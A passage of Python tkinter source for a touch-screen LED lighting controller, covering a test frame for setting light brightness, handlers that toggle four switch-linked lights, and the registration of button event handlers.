TestFrameCurrentValue < 0:\n TestFrameCurrentValue = 0\n elif TestFrameCurrentValue > 1000:\n TestFrameCurrentValue = 1000\n\n TestFrameValueField.configure(text=TestFrameCurrentValue)\n SetLEDBrightness(TestFrameCurrentLight, TestFrameCurrentValue)\n\n\nTestFrameBackButton = tk.Label(TestFrame, text='< Back', font=(MainFont, LargeFontSize), bg=ButtonBackColor, fg=ButtonFrontColor)\nTestFrameBackButton.grid(column=0, row=0, ipadx=10, padx=ButtonPadX, pady=ButtonPadY, sticky=tk.E + tk.S)\n\nTestFrameNameLabel = tk.Label(TestFrame, text='Name', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFrameNameLabel.grid(column=0, row=1, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFrameNameField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n anchor=tk.W, bg=EditBackColor)\nTestFrameNameField.grid(column=1, columnspan=3, row=1, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFrameModuleLabel = tk.Label(TestFrame, text='Module', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFrameModuleLabel.grid(column=0, row=2, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFrameModuleField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n anchor=tk.E, bg=EditBackColor)\nTestFrameModuleField.grid(column=1, row=2, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFramePortLabel = tk.Label(TestFrame, text='Port', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFramePortLabel.grid(column=2, row=2, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFramePortField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n anchor=tk.E, bg=EditBackColor)\nTestFramePortField.grid(column=3, row=2, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFrameValueLabel = tk.Label(TestFrame, text='Value', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFrameValueLabel.grid(column=0, row=4, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFrameValueField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n anchor=tk.E, bg=EditBackColor)\nTestFrameValueField.grid(column=1, row=4, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFrameValuePad = tk.Canvas(TestFrame, bg=EditBackColor)\nTestFrameValuePad.grid(column=0, row=5, columnspan=4, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\nTestFrameValuePad.bind('', TestFrameValuePadHandler)\n\nTestFrame.grid_columnconfigure(0, minsize=130)\nTestFrame.grid_columnconfigure(1, minsize=268)\nTestFrame.grid_columnconfigure(2, minsize=130)\nTestFrame.grid_columnconfigure(3, minsize=268)\n\n# List storing the current state of the four switches\nswitch_state = [False, False, False, False]\n\n\n# Service function to toggle the lights attached to the four switches\ndef toggle_switch(switch):\n try:\n # Look for the lights where the switch parameter corresponds to the switch being toggled\n light_toggled = next(light for light in light_list if 'switch' in light and light['switch'] == 'Switch ' + chr(switch+48))\n except:\n return # Exit function if there is no light with 'switch' == 'Switch X' in the list\n if switch_state[switch] is False:\n MainFrameLightButton[switch][\"image\"] = onButtonImage\n SetLEDBrightness(light_toggled, light_toggled['value_on'])\n switch_state[switch] = True\n else:\n MainFrameLightButton[switch][\"image\"] = offButtonImage\n SetLEDBrightness(light_toggled, light_toggled['value'])\n switch_state[switch] = False\n\n\ndef toggle_switch0(event=0):\n toggle_switch(0)\n\n\ndef toggle_switch1(event=0):\n toggle_switch(1)\n\n\ndef toggle_switch2(event=0):\n toggle_switch(2)\n\n\ndef toggle_switch3(event=0):\n toggle_switch(3)\n\n\n# Define tkinter buttons and pads, and their event handlers\nButtonList = [\n {'Name': MainFrameExitButton, 'Handler': MainFrameExitButtonPressed},\n {'Name': MainFrameShutdownButton, 'Handler': MainFrameShutdownButtonPressed},\n {'Name': MainFrameEditButton, 'Handler': MainFrameEditButtonPressed},\n {'Name': MainFrameNightButton, 'Handler': go_to_night},\n {'Name': MainFrameSkyButton, 'Handler': MainFrameSkyButtonPressed},\n {'Name': MainFrameAutoButton, 'Handler': MainFrameAutoButtonPressed},\n {'Name': MainFrameDayButton, 'Handler': go_to_day},\n {'Name': MainFrameLightButton[0], 'Handler': toggle_switch0},\n {'Name': MainFrameLightButton[1], 'Handler': toggle_switch1},\n {'Name': MainFrameLightButton[2], 'Handler': toggle_switch2},\n {'Name': MainFrameLightButton[3], 'Handler': toggle_switch3},\n {'Name': ListFrameBackButton, 'Handler': ListFrameBackButtonPressed},\n {'Name': ListFrameTestButton, 'Handler': ListFrameTestButtonPressed},\n {'Name': TestFrameBackButton, 'Handler': TestFrameBackButtonPressed}]\n\n# Register the button event handlers to tkinter widgets events\nfor Button in ButtonList:\n Button['Name'].bind(\"